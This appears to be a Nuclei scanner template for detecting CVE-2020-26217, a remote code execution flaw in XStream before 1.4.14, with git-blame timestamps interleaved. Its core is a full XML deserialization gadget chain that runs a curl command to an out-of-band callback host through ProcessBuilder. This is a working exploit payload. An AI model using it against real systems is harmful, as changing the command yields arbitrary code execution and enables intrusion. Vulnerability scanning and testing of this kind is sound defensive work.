2023-03-12 03:38:05 +00:00
id : CVE-2020-26217
info :
2023-04-09 03:01:09 +00:00
name : XStream < 1.4.14 - Remote Code Execution
2023-03-12 03:38:05 +00:00
author : pwnhxl
severity : high
2023-03-23 11:21:46 +00:00
description : |
XStream before version 1.4.14 is vulnerable to Remote Code Execution.The vulnerability may allow a remote attacker to run arbitrary shell commands only by manipulating the processed input stream. Only users who rely on blocklists are affected.
2023-03-12 03:38:05 +00:00
reference :
- https://x-stream.github.io/CVE-2020-26217.html
2023-03-29 20:18:04 +00:00
- https://github.com/x-stream/xstream/commit/0fec095d534126931c99fd38e9c6d41f5c685c1a
- https://github.com/x-stream/xstream/security/advisories/GHSA-mw36-7c6c-q4q2
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
cvss-score : 8.8
cve-id : CVE-2020-26217
cwe-id : CWE-78
2023-03-23 11:21:46 +00:00
tags : cve,cve2020,xstream,deserialization,rce,oast
2023-03-12 03:38:05 +00:00
requests :
- raw :
- |
POST / HTTP/1.1
Host : {{Hostname}}
Content-Type : application/xml
<map>
<entry>
<jdk.nashorn.internal.objects.NativeString>
<flags>0</flags>
<value class='com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data'>
<dataHandler>
<dataSource class='com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource'>
<contentType>text/plain</contentType>
<is class='java.io.SequenceInputStream'>
<e class='javax.swing.MultiUIDefaults$MultiUIDefaultsEnumerator'>
<iterator class='javax.imageio.spi.FilterIterator'>
<iter class='java.util.ArrayList$Itr'>
<cursor>0</cursor>
<lastRet>-1</lastRet>
<expectedModCount>1</expectedModCount>
<outer-class>
<java.lang.ProcessBuilder>
<command>
2023-03-29 18:40:01 +00:00
<string>curl http://{{interactsh-url}} -H 'User-Agent: {{rand_base(6)}}'</string>
2023-03-12 03:38:05 +00:00
</command>
</java.lang.ProcessBuilder>
</outer-class>
</iter>
<filter class='javax.imageio.ImageIO$ContainsFilter'>
<method>
<class>java.lang.ProcessBuilder</class>
<name>start</name>
<parameter-types/>
</method>
<name>start</name>
</filter>
<next/>
</iterator>
<type>KEYS</type>
</e>
<in class='java.io.ByteArrayInputStream'>
<buf></buf>
<pos>0</pos>
<mark>0</mark>
<count>0</count>
</in>
</is>
<consumed>false</consumed>
</dataSource>
<transferFlavors/>
</dataHandler>
<dataLen>0</dataLen>
</value>
</jdk.nashorn.internal.objects.NativeString>
<string>test</string>
</entry>
</map>
matchers-condition : and
matchers :
- type : word
part : interactsh_protocol
words :
2023-03-22 09:54:20 +00:00
- "http"
- type : word
part : interactsh_request
words :
2023-03-29 18:40:01 +00:00
- "User-Agent: {{rand_base(6)}}"